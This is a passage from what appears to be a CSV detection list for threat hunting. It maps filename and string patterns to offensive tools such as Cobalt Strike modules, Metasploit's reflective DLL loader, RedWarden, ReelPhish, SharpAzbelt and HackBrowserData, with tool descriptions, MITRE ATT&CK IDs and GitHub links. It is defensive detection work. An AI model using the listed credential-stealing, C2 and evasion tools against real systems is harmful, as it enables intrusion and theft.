","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*redskal/SharpAzbelt*",".{0,1000}redskal\/SharpAzbelt.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*redsocks-fw.sh stop*",".{0,1000}redsocks\-fw\.sh\sstop.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*Red-Team-Infrastructure-Wiki.*",".{0,1000}Red\-Team\-Infrastructure\-Wiki\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Red-Teaming-Toolkit*",".{0,1000}Red\-Teaming\-Toolkit.{0,1000}","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","8528","2138","2024-03-25T12:08:31Z","2018-04-26T13:35:09Z" "*RedTeamOperations*",".{0,1000}RedTeamOperations.{0,1000}","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RedTeamOperations","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RedWarden.py*",".{0,1000}RedWarden\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*RedWarden.test*",".{0,1000}RedWarden\.test.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*redwarden_access.log*",".{0,1000}redwarden_access\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*redwarden_redirector.log*",".{0,1000}redwarden_redirector\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*ReelPhish*",".{0,1000}ReelPhish.{0,1000}","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). 
Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","6","501","153","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z" "*reflct_dll_inject.exe*",".{0,1000}reflct_dll_inject\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*reflective_assembly_minified.ps1*",".{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reflective_dll_inject*",".{0,1000}reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reflective_pe_loader.*",".{0,1000}reflective_pe_loader\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveDll.*",".{0,1000}ReflectiveDll\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*ReflectiveDll.x64.dll*",".{0,1000}ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*ReflectiveDll.x86.dll*",".{0,1000}ReflectiveDll\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*ReflectiveDLLInjection*",".{0,1000}ReflectiveDLLInjection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveDllInjection.*",".{0,1000}ReflectiveDllInjection\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ReflectiveDLLInjection.h*",".{0,1000}ReflectiveDLLInjection\.h.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*ReflectiveDLLInjection/dll*",".{0,1000}ReflectiveDLLInjection\/dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*ReflectiveLoader.*",".{0,1000}ReflectiveLoader\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" 